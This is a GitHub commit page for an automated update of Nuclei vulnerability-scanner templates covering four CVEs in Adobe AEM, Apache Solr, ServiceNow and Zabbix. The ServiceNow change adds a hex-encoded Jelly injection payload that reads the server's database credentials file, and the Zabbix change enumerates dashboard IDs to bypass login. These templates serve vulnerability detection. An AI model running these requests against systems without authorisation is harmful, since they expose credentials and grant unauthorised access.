Skip to content

Commit

Permalink
Auto Update Nuclei [Sun Dec 22 12:35:11 UTC 2024] :robot:
Browse files Browse the repository at this point in the history
  • Loading branch information
actions-user committed Dec 22, 2024
1 parent f1f3bb4 commit 3b5255c
Show file tree
Hide file tree
Showing 4 changed files with 39 additions and 9 deletions.
2 changes: 1 addition & 1 deletion plugins/adobe/experience_manager/CVE-2019-16469.yaml
Original file line number Diff line number Diff line change
Expand Up @@ -57,4 +57,4 @@ http:
- type: status
status:
- 200
# digest: 4b0a00483046022100dfd7f570df282abcd477089f806a3da8cca2586fac4daabc1073744f39cbad1e0221008c78078ee7136ba2970f733df26153d18121edade320c688576ed0e59a94cb8f:922c64590222798bb761d5b6d8e72950
# digest: 4a0a0047304502203f60ab7bdc03adf0b66d23899f1ef07c9c001360b1b4e13b48546d4a15650e7c022100899c4782d93b51cf5f26326a88d6f4b6a8777e4dc622277712cef25804b5e99f:922c64590222798bb761d5b6d8e72950
2 changes: 1 addition & 1 deletion plugins/apache/solr/CVE-2024-45216.yaml
Original file line number Diff line number Diff line change
Expand Up @@ -51,4 +51,4 @@ http:
- type: status
status:
- 200
# digest: 4a0a00473045022100b40c1a3e99c58bd37830a7fb4e66ad378d3cccf46ce334ffee3d3d9386b796cc022061fa75005d7b4ff91d634c30f3edcdf2220626212b97ef9d911bc3ecfc11c8f5:922c64590222798bb761d5b6d8e72950
# digest: 4a0a00473045022100f10577a965459d9690909093768db1845c47dcd4b5fe6a5b4087fd477db88517022073d9d7cbc428a8907e7456e1b0d4f8739830f0444f230bc5146c74e606747270:922c64590222798bb761d5b6d8e72950
12 changes: 9 additions & 3 deletions plugins/servicenow/servicenow/CVE-2024-5217.yaml
Original file line number Diff line number Diff line change
Expand Up @@ -13,7 +13,7 @@ info:
- https://nvd.nist.gov/vuln/detail/CVE-2024-5217
metadata:
verified: true
max-request: 1
max-request: 2
vendor: servicenow
product: servicenow
shodan-query:
Expand All @@ -31,6 +31,12 @@ http:
GET /login.do?jvar_page_title=%3Cstyle%3E%3Cj%3Ajelly%2Bxmlns%3Aj%3D%22jelly%3Acore%22%2Bxmlns%3Ag%3D'glide'%3E%3Cg%3Aevaluate%3Ez%3Dnew%2BPackages.java.io.File(%22%22).getAbsolutePath()%3Bz%3Dz.substring(0%2Cz.lastIndexOf(%22%2F%22))%3Bu%3Dnew%2BSecurelyAccess(z.concat(%22%2Fco..nf%2Fglide.db.properties%22)).getBufferedReader()%3Bs%3D%22%22%3Bwhile((q%3Du.readLine())!%3D%3Dnull)s%3Ds.concat(q%2C%22%5Cn%22)%3Bgs.addErrorMessage(s)%3B%3C%2Fg%3Aevaluate%3E%3C%2Fj%3Ajelly%3E%3C%2Fstyle%3E HTTP/1.1
Host: {{Hostname}}
- |
GET /login.do?jvar_page_title=%3c%73%74%79%6c%65%3e%3c%6a%3a%6a%65%6c%6c%79%20%78%6d%6c%6e%73%3a%6a%3d%22%6a%65%6c%6c%79%3a%63%6f%72%65%22%20%78%6d%6c%6e%73%3a%67%3d%27%67%6c%69%64%65%27%3e%3c%67%3a%65%76%61%6c%75%61%74%65%3e%7a%3d%6e%65%77%20%50%61%63%6b%61%67%65%73%2e%6a%61%76%61%2e%69%6f%2e%46%69%6c%65%28%22%22%29%2e%67%65%74%41%62%73%6f%6c%75%74%65%50%61%74%68%28%29%3b%7a%3d%7a%2e%73%75%62%73%74%72%69%6e%67%28%30%2c%7a%2e%6c%61%73%74%49%6e%64%65%78%4f%66%28%22%2f%22%29%29%3b%75%3d%6e%65%77%20%53%65%63%75%72%65%6c%79%41%63%63%65%73%73%28%7a%2e%63%6f%6e%63%61%74%28%22%2f%63%6f%2e%2e%6e%66%2f%67%6c%69%64%65%2e%64%62%2e%70%72%6f%70%65%72%74%69%65%73%22%29%29%2e%67%65%74%42%75%66%66%65%72%65%64%52%65%61%64%65%72%28%29%3b%73%3d%22%22%3b%77%68%69%6c%65%28%28%71%3d%75%2e%72%65%61%64%4c%69%6e%65%28%29%29%21%3d%3d%6e%75%6c%6c%29%73%3d%73%2e%63%6f%6e%63%61%74%28%71%2c%22%5c%6e%22%29%3b%67%73%2e%61%64%64%45%72%72%6f%72%4d%65%73%73%61%67%65%28%73%29%3b%3c%2f%67%3a%65%76%61%6c%75%61%74%65%3e%3c%2f%6a%3a%6a%65%6c%6c%79%3e%3c%2f%73%74%79%6c%65%3e HTTP/1.1
Host: {{Hostname}}
stop-at-first-match: true

matchers-condition: and
matchers:
- type: word
Expand All @@ -39,11 +45,11 @@ http:
- "glide.db.user"

- type: word
part: header
part: content_type
words:
- 'text/html'

- type: status
status:
- 200
# digest: 4a0a00473045022100e2c12e3a260a655e9eeff1e903a7f30bfb02c955d3799611413f684f906f373a022030cd5e20fa218f5df742529d01fc6779de45eb72228cc938f11bf167c681e8e4:922c64590222798bb761d5b6d8e72950
# digest: 490a004630440220132790c2e4ab568d232df092a9b1a55bbae776b309c759285c462411d65fc7a202202a5f22256487fedd4806a28a0d3c6538ca35cbfd24972fb0a576f27dc96ddd43:922c64590222798bb761d5b6d8e72950
32 changes: 28 additions & 4 deletions plugins/zabbix/zabbix/CVE-2019-17382.yaml
Original file line number Diff line number Diff line change
Expand Up @@ -36,18 +36,42 @@ info:
- app="zabbix-监控系统" && body="saml"
- title="zabbix-server"
google-query: intitle:"zabbix-server"
tags: cve2019,cve,fuzz,auth-bypass,login,edb,zabbix
tags: cve2019,cve,auth-bypass,login,edb,zabbix

flow: http(1) && http(2)

http:
- raw:
- |
GET /zabbix.php?action=dashboard.view&dashboardid={{ids}} HTTP/1.1
GET {{path}} HTTP/1.1
Host: {{Hostname}}
payloads:
ids: helpers/wordlists/numbers.txt
path:
- /
- /zabbix.php
- /zabbix/zabbix.php

stop-at-first-match: true
matchers:
- type: dsl
dsl:
- 'contains_any(tolower(body), "<title>warning [refreshed every", "zabbix-logo", "content=\"zabbix sia")'
internal: true

- raw:
- |
GET {{path}}?action=dashboard.view&dashboardid={{ids}} HTTP/1.1
Host: {{Hostname}}
payloads:
path:
- /zabbix.php
- /zabbix/zabbix.php
ids: helpers/wordlists/numbers.txt
attack: clusterbomb

stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
Expand All @@ -57,4 +81,4 @@ http:
- type: status
status:
- 200
# digest: 490a004630440220661ffdbcf3b823a661f04d9e3ab8e76a519218428d655080f8561ce2354964e502206d3fba8089cd99553648b82253612f7cbd7d17519139748b914e8967f52fd496:922c64590222798bb761d5b6d8e72950
# digest: 4a0a004730450221008930a2e278a437112ca2edb5b44d774ed69202fe9aaabefa6a98451ff62395b00220671676f8f0cb9821650aca3a1b8a4b3567ad35f01b74cc3ac1dde035781f2f1d:922c64590222798bb761d5b6d8e72950

0 comments on commit 3b5255c

Please sign in to comment.